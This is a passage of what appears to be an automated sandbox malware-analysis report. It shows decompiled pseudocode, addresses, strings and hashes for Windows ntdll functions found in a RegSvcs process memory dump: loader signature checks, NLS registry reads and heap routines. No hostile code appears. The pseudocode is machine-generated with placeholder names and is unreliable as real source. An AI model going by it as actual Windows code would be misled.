							E01945510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x19b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E018E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01947016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E018E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01947016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E018FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E018CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x018d7e4c
0x018d7e50
0x018d7e55
0x018d7e58
0x018d7e5d
0x018d7e71
0x018d7f33
0x018d7e77
0x018d7e77
0x018d7e79
0x018d7e79
0x018d7e7e
0x018d7f45
0x01929848
0x00000000
0x01929848
0x018d7f4e
0x018d7f53
0x018d7f5a
0x00000000
0x00000000
0x0192985a
0x01929862
0x01929866
0x00000000
0x0192986c
0x00000000
0x0192986c
0x018d7e84
0x018d7e84
0x018d7e8d
0x01929871
0x018d7eb8
0x018d7ec0
0x018d7ec0
0x018d7e9a
0x0192987e
0x00000000
0x00000000
0x01929884
0x0192988b
0x019298a7
0x019298ac
0x019298b1
0x019298b6
0x019298b8
0x019298b8
0x019298b9
0x00000000
0x019298b9
0x018d7ea0
0x018d7ea7
0x00000000
0x00000000
0x018d7eac
0x018d7eb1
0x018d7ec6
0x018d7ed0
0x019298cc
0x018d7ed6
0x018d7ed6
0x018d7ed6
0x018d7ede
0x018d7ee3
0x019298e3
0x019298f0
0x01929902
0x019298f2
0x019298fb
0x019298fb
0x01929907
0x0192991d
0x0192991d
0x01929907
0x019298e3
0x018d7ef0
0x018d7f14
0x018d7f14
0x018d7f1e
0x01929946
0x018d7f24
0x018d7f24
0x018d7f24
0x018d7f2c
0x0192996a
0x01929975
0x01929975
0x0192997e
0x01929993
0x01929993
0x0192997e
0x00000000
0x018d7ef2
0x018d7efc
0x018d7f0a
0x018d7f0e
0x01929933
0x00000000
0x01929933
0x00000000
0x018d7f0e
0x00000000
0x00000000
0x00000000
0x018d7eb1

Strings

LdrpCompleteMapModule, xrefs: 01929898
minkernel\ntdll\ldrmap.c, xrefs: 019298A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01929891

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 489a078f533ca1323ca4f7649a53373b2e7ebfef56f8d0b8688f4a55b6caa87b
Instruction ID: 36378adeba1b92ed83871981048670938c9a9fe3a4d8bf9b81654455190cdd59
Opcode Fuzzy Hash: 489a078f533ca1323ca4f7649a53373b2e7ebfef56f8d0b8688f4a55b6caa87b
Instruction Fuzzy Hash: 43511231600759DBE722CB6CC984B2A7BE4EB41B2CF040699EA55DB3D2C770EE00C791

Uniqueness

Uniqueness Score: -1.00%

Function 018CE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E018CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E018CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019095D0();
						}
						if(_t78 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0190FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0190BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01909600();
					if(_t97 < 0) {
						goto L6;
					}
					E0190BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L018CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0190BB40(_t83, _t102 + 0x24, _t78);
								if(L018D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0190BB40(_t84, _t102 + 0x24, _t94);
									if(L018D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x018ce620
0x018ce628
0x018ce62f
0x018ce631
0x018ce635
0x018ce637
0x018ce63e
0x01925503
0x01925503
0x018ce64c
0x018ce64c
0x018ce651
0x00000000
0x00000000
0x018ce661
0x018ce665
0x0192542a
0x018ce715
0x018ce71a
0x018ce71c
0x018ce720
0x018ce720
0x018ce727
0x018ce736
0x018ce736
0x018ce743
0x018ce743
0x018ce673
0x018ce678
0x018ce67d
0x018ce682
0x018ce685
0x018ce692
0x018ce69b
0x018ce6a3
0x018ce6ad
0x018ce6b1
0x018ce6b2
0x018ce6bb
0x018ce6bf
0x018ce6c0
0x018ce6c8
0x018ce6cc
0x018ce6d5
0x018ce6d9
0x00000000
0x00000000
0x018ce6e5
0x018ce6ea
0x018ce6f9
0x018ce70b
0x018ce70f
0x01925439
0x0192545e
0x0192545e
0x00000000
0x0192545e
0x0192543b
0x0192543e
0x01925440
0x01925445
0x01925472
0x01925475
0x0192548d
0x01925493
0x019254a9
0x00000000
0x00000000
0x019254ab
0x019254b4
0x019254bc
0x019254c8
0x019254de
0x019254fb
0x019254e0
0x019254e6
0x019254eb
0x019254eb
0x019254de
0x00000000
0x019254bc
0x01925477
0x0192547a
0x01925480
0x01925483
0x01925486
0x0192548b
0x00000000
0x00000000
0x00000000
0x0192548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01925447
0x01925447
0x01925447
0x01925447
0x0192544e
0x00000000
0x00000000
0x01925450
0x01925452
0x01925455
0x0192545a
0x00000000
0x00000000
0x00000000
0x0192545c
0x0192546a
0x0192546d
0x0192546f
0x00000000
0x0192546f
0x018ce70f

Strings

@, xrefs: 018CE6C0
InstallLanguageFallback, xrefs: 018CE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018CE68C

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8c83a0a860510f8b670aefbaadc0bacd58111a2c88bdbeb952d402d9197660e0
Instruction ID: 2c266e07e86fc8ddec9babe0c87d7c2a92335651ab7abd906727b95f39cb14b3
Opcode Fuzzy Hash: 8c83a0a860510f8b670aefbaadc0bacd58111a2c88bdbeb952d402d9197660e0
Instruction Fuzzy Hash: 7351C5765083569BE715DF28C440AABB7ECBF88B15F05092EFA89D7240F734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 018EB8E4 Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E018EB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x19b8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E018CB150();
						} else {
							E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E018CB150();
						__eflags =  *0x19b7bc8;
						if(__eflags == 0) {
							E01982073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E018EAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x018eb8f0
0x018eb8f2
0x018eb8f4
0x01932c4e
0x01932c50
0x01932c56
0x01932c5c
0x01932c60
0x01932c7f
0x01932c84
0x01932c62
0x01932c77
0x01932c7c
0x01932c8a
0x01932c8f
0x01932c94
0x01932c9c
0x01932ca5
0x01932ca5
0x01932c9c
0x01932c50
0x018eb8fa
0x018eb902
0x018eb921
0x018eb921
0x018eb924
0x018eb924
0x018eb927
0x00000000
0x00000000
0x018eb929
0x018eb92b
0x018eb92d
0x018eb940
0x00000000
0x018eb940
0x018eb932
0x018eb932
0x00000000
0x018eb932
0x00000000
0x018eb904
0x018eb904
0x018eb90a
0x018eb90c
0x018eb916
0x018eb919
0x018eb915
0x018eb915
0x018eb91b
0x018eb91b
0x00000000
0x018eb910

Strings

HEAP: , xrefs: 01932C7F
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01932C8A
HEAP[%wZ]: , xrefs: 01932C72

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: dace296aac8cd59296f739bcade850f9a8b38dd7177646b43c2178b02cb73236
Instruction ID: 764a92d8fbc29fceed37bed301c632597367210a39bb2b52c3edd6d47aba6ebb
Opcode Fuzzy Hash: dace296aac8cd59296f739bcade850f9a8b38dd7177646b43c2178b02cb73236
Instruction Fuzzy Hash: 3411D3317045069FD729EB19C499B36B7E5EB81B64F19816DE04ACB341E670DA44C741

Uniqueness

Uniqueness Score: -1.00%

Function 0195FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0195FF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0195FF60

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: 29f9c9c24640485b1a1383c133250765b38da322dfc9a5ab3415ab9e72508de6
Instruction ID: bea7d17b6a105947143d36249e2399ce1cf5f08279b6036ce080e8af7f2b1095
Opcode Fuzzy Hash: 29f9c9c24640485b1a1383c133250765b38da322dfc9a5ab3415ab9e72508de6
Instruction Fuzzy Hash: 3F112671A50148EFEB66DF54C988F98BBF1FF44715F158044F90C676A1C7389A80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0198E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0198E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0198BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0198BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0198AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01909730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0198A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0198A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01909730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0198A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0198A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E018E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E018DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E018DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E018E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0197FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0198e547
0x0198e549
0x0198e54f
0x0198e553
0x0198e557
0x0198e55a
0x0198e55c
0x0198e55f
0x0198e561
0x0198e567
0x0198e56b
0x0198e7e2
0x00000000
0x0198e571
0x0198e575
0x0198e577
0x0198e57b
0x0198e57c
0x0198e57d
0x0198e57e
0x0198e57f
0x0198e588
0x0198e58f
0x0198e591
0x0198e592
0x0198e592
0x0198e596
0x0198e59e
0x0198e5a0
0x0198e5a6
0x0198e61d
0x0198e61d
0x0198e621
0x0198e623
0x0198e630
0x0198e630
0x0198e7e6
0x0198e7eb
0x0198e7ed
0x0198e7f4
0x0198e7fa
0x0198e7ff
0x0198e7ff
0x0198e80a
0x0198e812
0x0198e812
0x0198e5ab
0x0198e5b4
0x0198e5b9
0x0198e5be
0x0198e5c0
0x0198e5c2
0x0198e5c8
0x0198e5c9
0x0198e5cb
0x0198e5cc
0x0198e5d5
0x0198e5e4
0x0198e5f1
0x0198e5f8
0x0198e5f8
0x0198e5d5
0x0198e602
0x0198e616
0x0198e63d
0x0198e644
0x0198e64d
0x0198e652
0x0198e657
0x0198e659
0x0198e65b
0x0198e661
0x0198e662
0x0198e664
0x0198e665
0x0198e66e
0x0198e67d
0x0198e68a
0x0198e691
0x0198e691
0x0198e66e
0x0198e6b0
0x00000000
0x0198e6b6
0x0198e6bd
0x0198e6c7
0x0198e6d7
0x0198e6d9
0x0198e6db
0x0198e6de
0x0198e6e3
0x0198e6f3
0x0198e6fc
0x0198e700
0x0198e700
0x0198e704
0x0198e70a
0x0198e70a
0x0198e713
0x0198e716
0x0198e719
0x0198e720
0x0198e761
0x0198e76b
0x0198e774
0x0198e77a
0x0198e77a
0x0198e78a
0x0198e791
0x0198e799
0x0198e79b
0x0198e79f
0x0198e7aa
0x0198e7c0
0x0198e7ac
0x0198e7b2
0x0198e7b9
0x0198e7b9
0x0198e7c7
0x0198e806
0x00000000
0x0198e7c9
0x0198e7d1
0x0198e7d8
0x00000000
0x0198e7d8
0x00000000
0x00000000
0x0198e722
0x0198e72e
0x0198e748
0x0198e74c
0x0198e754
0x0198e756
0x0198e75c
0x0198e75c
0x00000000
0x0198e75c
0x0198e758
0x0198e758
0x00000000
0x0198e758
0x0198e750
0x00000000
0x00000000
0x0198e752
0x00000000
0x0198e752
0x0198e730
0x0198e735
0x0198e73d
0x0198e73f
0x00000000
0x00000000
0x0198e741
0x0198e741
0x00000000
0x0198e741
0x0198e739
0x00000000
0x00000000
0x0198e73b
0x00000000
0x0198e73b
0x0198e722
0x0198e720
0x0198e6b0
0x0198e618
0x00000000
0x0198e618

Strings

`, xrefs: 0198E5D7
`, xrefs: 0198E670

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: b2d208d74e17a1ccdcf49f80ee245b5d8faaa14fa7fd4b98a29950d3cd2e2fef
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 839170312043429FE725EE29C855B1BBBE9BFC4715F18892DF699CB280E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019451BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E019451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19a05f0);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019453CA(0);
						return E0191D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0190F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E018E3690(1, _t117, 0x18a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0190AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L018E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0190AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
